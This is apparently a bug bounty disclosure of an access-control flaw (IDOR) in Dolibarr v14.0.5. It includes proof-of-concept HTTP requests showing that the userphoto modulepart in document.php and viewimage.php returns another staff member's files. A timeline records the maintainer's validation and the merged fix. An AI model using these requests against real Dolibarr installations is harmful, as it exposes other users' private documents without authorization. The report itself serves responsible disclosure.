Improper Access Control (IDOR) in dolibarr/dolibarr

Valid

Reported on

Feb 22nd 2022


Description

Dolibarr v14.0.5 allows improper access control issues in the userphoto modulepart. The impact could lead to data exposure as the attached files and documents may contain sensitive information of relevant parties such as contacts, suppliers, invoices, orders, stocks, agenda, accounting and more.

Proof of Concept

**** Scenario: Staff_2 is trying to request property of Staff_3

Tampered Request: in modulepart=user 
GET /dolibarr/document.php?modulepart=user&entity=1&file=3/fileuser3.txt HTTP/1.1
Host: localhost
Cookie: DOLSESSID_328fed74f1e6fdd21cc158ce6354602f={cookie_value}

Expected Response:
Access denied. You try to access to a page, area or feature of a disabled module or without being in an authenticated session or that is not allowed to your user. 
Current login: staff_2 
Permission for this login can be defined by your Dolibarr administrator from menu Home->Users.

<SNIP><SNIP>

Tampered Request: using modulepart=userphoto
GET /dolibarr/document.php?modulepart=userphoto&attachment=0&file=3/fileuser3.txt&entity=1 HTTP/1.1
Host: localhost
Cookie: DOLSESSID_328fed74f1e6fdd21cc158ce6354602f={cookie_value}

Tampered Response:
**Staff 3 file content return**

<SNIP><SNIP>

Tampered Request: using modulepart=userphoto
GET /dolibarr/viewimage.php?modulepart=userphoto&entity=1&file=3/fileuser3.txt&cache=0 HTTP/1.1
Host: localhost
Cookie: DOLSESSID_328fed74f1e6fdd21cc158ce6354602f={cookie_value}

Tampered Response:
**Staff 3 file content return**

Impact

This vulnerability is capable of downloading or reading any file types such as pdf, zip, txt, jpg and more thus leading to sensitive information exposure of relevant parties.

We are processing your report and will contact the dolibarr team within 24 hours. 3 months ago
Laurent Destailleur validated this vulnerability 3 months ago
Faisal Fs has been awarded the disclosure bounty
The fix bounty is now up for grabs
Laurent Destailleur confirmed that a fix has been merged on 209ab7 3 months ago
Laurent Destailleur has been awarded the fix bounty
to join this conversation